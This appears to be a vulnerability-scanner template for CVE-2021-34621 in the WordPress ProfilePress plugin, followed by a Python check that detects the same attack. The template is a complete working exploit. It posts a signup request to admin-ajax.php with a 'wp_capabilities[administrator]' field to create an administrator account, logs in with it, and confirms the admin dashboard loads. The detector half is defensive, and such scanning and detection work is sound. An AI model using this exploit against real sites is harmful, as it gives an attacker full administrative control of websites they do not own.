id: CVE-2021-34621

info:
  name: WordPress ProfilePress wp-user-avatar plugin make admin users
  author: 0xsapra
  severity: critical
  reference: https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin
  tags: cve,cve2021,wordpress,wp-plugin
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2021-34621
    cwe-id: CWE-269
  description: "A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth.php file of the ProfilePress WordPress plugin made it possible for users to register on sites as an administrator. This issue affects versions 3.0.0 - 3.1.3."

requests:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_username"

        {{randstr}}
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_email"

        {{randstr}}@example.com
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_password"

        {{randstr}}@example.com
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_password_present"

        true
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_first_name"

        {{randstr}}@example.com
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_last_name"

        {{randstr}}@example.com
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="_wp_http_referer"

        /wp/?page_id=18
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="pp_current_url"

        {{BaseURL}}
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="wp_capabilities[administrator]"

        1
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="signup_form_id"

        1
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="signup_referrer_page"


        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="action"

        pp_ajax_signup
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="melange_id"


        -----------------------------138742543134772812001999326589--

      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In

      - |
        GET /wp-admin/ HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Connection: close

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Welcome to your WordPress Dashboard"

      - type: status
        status:
          - 200
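As an added defensive example (not part of the template or of the ProfilePress plugin), the Python check below parses a multipart/form-data request body and flags a pp_ajax_signup request to admin-ajax.php that carries a browser-supplied wp_capabilities[...] field, the pattern the template above probes for. The function names and both sample bodies are constructed for this example.

```python
import re

# Field names and endpoint come from the ProfilePress signup request in the template above.
SIGNUP_ACTION = "pp_ajax_signup"
AJAX_PATH = "/wp-admin/admin-ajax.php"
BOUNDARY = "---------------------------138742543134772812001999326589"  # from the template

def boundary_from_content_type(content_type: str) -> str:
    """Extract the boundary parameter from a multipart/form-data Content-Type header."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("not a multipart/form-data request")
    return m.group(1)

def parse_multipart(body: str, boundary: str) -> dict:
    """Return {field_name: value} for a multipart/form-data body with text parts only."""
    fields = {}
    for part in body.split(f"--{boundary}"):
        part = part.strip("\r\n")
        if not part or part == "--":  # preamble/epilogue or the closing "--" marker
            continue
        headers, _, value = part.partition("\r\n\r\n")
        m = re.search(r'name="([^"]*)"', headers)
        if m:
            fields[m.group(1)] = value  # empty value when the part has no body
    return fields

def is_capability_injection(path: str, fields: dict) -> bool:
    """Flag a ProfilePress signup whose browser-supplied fields try to set wp_capabilities."""
    if not path.endswith(AJAX_PATH) or fields.get("action") != SIGNUP_ACTION:
        return False
    return any(name.startswith("wp_capabilities[") for name in fields)

def build_body(boundary: str, pairs) -> str:
    """Assemble a multipart/form-data body from (name, value) pairs (constructed sample input)."""
    lines = []
    for name, value in pairs:
        lines += [f"--{boundary}", f'Content-Disposition: form-data; name="{name}"', "", value]
    return "\r\n".join(lines + [f"--{boundary}--", ""])

# Constructed samples: an ordinary signup and one carrying the capability field.
BENIGN = build_body(BOUNDARY, [("reg_username", "alice"), ("reg_email", "alice@example.com"),
                               ("signup_referrer_page", ""), ("action", SIGNUP_ACTION)])
MALICIOUS = build_body(BOUNDARY, [("reg_username", "alice"), ("wp_capabilities[administrator]", "1"),
                                  ("action", SIGNUP_ACTION)])

if __name__ == "__main__":
    boundary = boundary_from_content_type(f"multipart/form-data; boundary={BOUNDARY}")
    for label, body in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, "->", is_capability_injection(AJAX_PATH, parse_multipart(body, boundary)))
```

The same check can be applied to the parsed form fields at a WAF or reverse proxy; on a patched site the field is simply ignored, so a hit indicates probing rather than compromise.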